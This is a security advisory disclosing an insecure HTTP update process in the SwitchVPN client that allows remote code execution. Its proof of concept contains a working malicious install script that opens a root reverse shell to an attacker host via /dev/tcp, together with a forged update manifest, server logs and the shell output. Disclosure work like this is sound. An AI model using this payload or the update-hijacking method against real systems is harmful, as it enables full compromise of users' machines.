=======================================================================
Title: Insecure Update Process and RCE
Product: SwitchVPN for MacOS, Windows
Vulnerable version: 2.1012.03
CVE ID: Requested
Impact: Critical
Homepage: https://switchvpn.net/
Identified: 2018-11-01
By: Bernd Leitner (bernd.leitner [at] gmail dot com)
=======================================================================

Vendor description:
-------------------
"By 2015 we were frustrated that the free internet we loved was under
threat.
As experts in online security we believed we could solve this problem. So we
came together as a team to make SwitchVPN, a simple and powerful app to keep
the internet free. SwitchVPN is simple. Install it on your phone, tablet or
laptop, then just switch it on to keep the internet free. SwitchVPN is
powerful.
Our exclusive VPN Service technology is constantly being upgraded by a
dedicated
team of internet security experts."

Source: https://switchvpn.net/


Business recommendation:
------------------------
By exploiting the vulnerability documented in this advisory, an attacker
can leverage the update process to install malware or execute arbitrary code
and fully compromise the system.

Users are urged to disable auto-updates and do not run the manual update
utility
until the issue has been fixed.


Vulnerability overview/description:
-----------------------------------
Insecure Update Process

The update process in the SwitchVPN client is vulnerable to a MiTM
(man-in-the-middle) attack. The client either checks for the availability
of
a new version using the integrated auto-update function, or the user can
manually initiate an update using an update utility. Version information is
pulled from a remote XML file and compared to the version number of the
currently installed SwitchVPN client.

All requests are transmitted over HTTP, which means that an attacker on the
same network is able to intercept and manipulate the traffic.

This means, an attacker can trigger the SwitchVPN client to download a
malicious update package which will be installed on the device. In addition
to that, an attacker is able to implant an installation script
(installscript.qs)
which will get executed immediately with elevated privileges. When
auto-update
is enabled (which is the default setting), this process happens completely
transparent to the user.


Proof of concept
-----------------

In order to demonstrate the issue, a PoC for spawning a remote shell on
MacOS is
presented. A demonstration video can be (temporarily) downloaded from:
https://www.dropbox.com/s/zwczouzh922z2un/poc_switchvpn_update.mov

NOTE: Delivering a malicious payload through the main update package can be
set up
the same way:

1) Prepare malicious installscript.qs:
============================================================================================
...
Component.prototype.createOperations = function()
{
    component.createOperations();

    installer.execute("touch", "/tmp/pwn.sh");
    installer.execute("/bin/sh", new Array("-c", 'echo "bash -i >& /dev/tcp/
192.168.1.2/9999 0>&1" >> /tmp/pwn.sh'));
installer.execute("/bin/sh", new Array("-c", "chmod 755 /tmp/pwn.sh"));
    component.addElevatedOperation("Execute", "/tmp/pwn.sh");

    installer.installationFinished.connect(this,
Component.prototype.installationFinishedPageIsShown);
}
Component.prototype.installationFinishedPageIsShown = function()
{
    console.log("Component.prototype.installationFinishedPageIsShown\n\n");
}
...
============================================================================================

2) Store "installscript.qs" in folder "com.svpn.osx" and compress to
"2.6666.03meta.7z":
============================================================================================
mb:~ b$ shasum 2.6666.03meta.7z
20ebcbe4ff4f9876b3f49bf6db74a1b89d19100f  2.6666.03meta.7z
============================================================================================

3) Prepare "Update.xml" which will be delivered to SwitchVPN client:
============================================================================================
<Updates>
<ApplicationName>{AnyApplication}</ApplicationName>
<ApplicationVersion>1.0.0</ApplicationVersion>
<Checksum>true</Checksum>
<PackageUpdate>
<Name>com.svpn.osx</Name>
<DisplayName>Switch VPN</DisplayName>
<Description>Switch VPN</Description>
<Script>installscript.qs</Script>
<Version>2.6666.03</Version> // <----- New (high) version number to trigger
update
<ReleaseDate>2017-10-12</ReleaseDate>
<Default>true</Default>
<ForcedInstallation>true</ForcedInstallation>
<RequiresAdminRights>true</RequiresAdminRights>
<UpdateFile CompressedSize="12805545" OS="Any" UncompressedSize="33330707"/>
<DownloadableArchives>SwitchVPN.app.7z</DownloadableArchives>
<SHA1>20ebcbe4ff4f9876b3f49bf6db74a1b89d19100f</SHA1> // <----- SHA-1 hash
of 2.6666.03meta.7z
</PackageUpdate>
</Updates>
============================================================================================

4) Perform MiTM attack (e.g. using arpspoof, bettercap, etc...)
============================================================================================
NOTE: Setting up a MiTM environment won't be discussed in this advisory.

Create the following folder structure for the malicious web-server:
/updates/osx/repo/com.svpn.osx

Store Update.xml to:
/updates/osx/repo/Update.xml

Store malicious update data to:
/updates/osx/repo/com.svpn.osx/
-rw-r--r--@ 1 b  staff  12805505 Nov  1 14:37 2.6666.03SwitchVPN.app.7z
-rw-r--r--@ 1 b  staff        40 Nov  1 14:37 2.6666.03SwitchVPN.app.7z.sha1
-rw-r--r--@ 1 b  staff       526 Nov  1 20:36 2.6666.03meta.7z <-----
contains malicious "installscript.qs"
============================================================================================

5) Start SwitchVPN client or run the manual update utility:
============================================================================================
# Requests are successfully redirected to our web-server

Serving HTTP on 0.0.0.0 port 80 ...
127.0.0.1 - - [01/Nov/2018 22:26:59] "GET
/updates/osx/repo/Updates.xml?1775745742 HTTP/1.1" 200 -
127.0.0.1 - - [01/Nov/2018 22:26:59] "GET
/updates/osx/repo/com.svpn.osx/2.6666.03meta.7z HTTP/1.1" 200 -
127.0.0.1 - - [01/Nov/2018 22:27:01] "GET
/updates/osx/repo/Updates.xml?457235306 HTTP/1.1" 200 -
127.0.0.1 - - [01/Nov/2018 22:27:01] "GET
/updates/osx/repo/com.svpn.osx/2.6666.03meta.7z HTTP/1.1" 200 -
127.0.0.1 - - [01/Nov/2018 22:27:01] "GET
/updates/osx/repo/com.svpn.osx/2.6666.03SwitchVPN.app.7z.sha1 HTTP/1.1" 200
-
127.0.0.1 - - [01/Nov/2018 22:27:01] "GET
/updates/osx/repo/com.svpn.osx/2.6666.03SwitchVPN.app.7z HTTP/1.1" 200 -
...
============================================================================================

6) Receive reverse shell:
============================================================================================
# Start netcat listener before starting SwitchVPN client

mb:~ b$ nc -l 9999

bash: no job control in this shell
bash-3.2# whoami
root
============================================================================================

Vulnerable / tested versions:
-----------------------------
The following version has been tested and found to be vulnerable: 2.1012.03.
Earlier versions might be vulnerable as well. Both, the Windows and MacOS
versions are vulnerable.


Vendor contact timeline:
------------------------
2018-11-01: Contacted vendor through management@switchvpn.net
2018-11-02: Sent advisory and link to PoC video to management@switchvpn.net
2018-11-11: Requested update from vendor
2018-11-12: Informed vendor about advisory release

Solution:
---------
None.


Workaround:
-----------
None.


EOF B. Leitner / @2018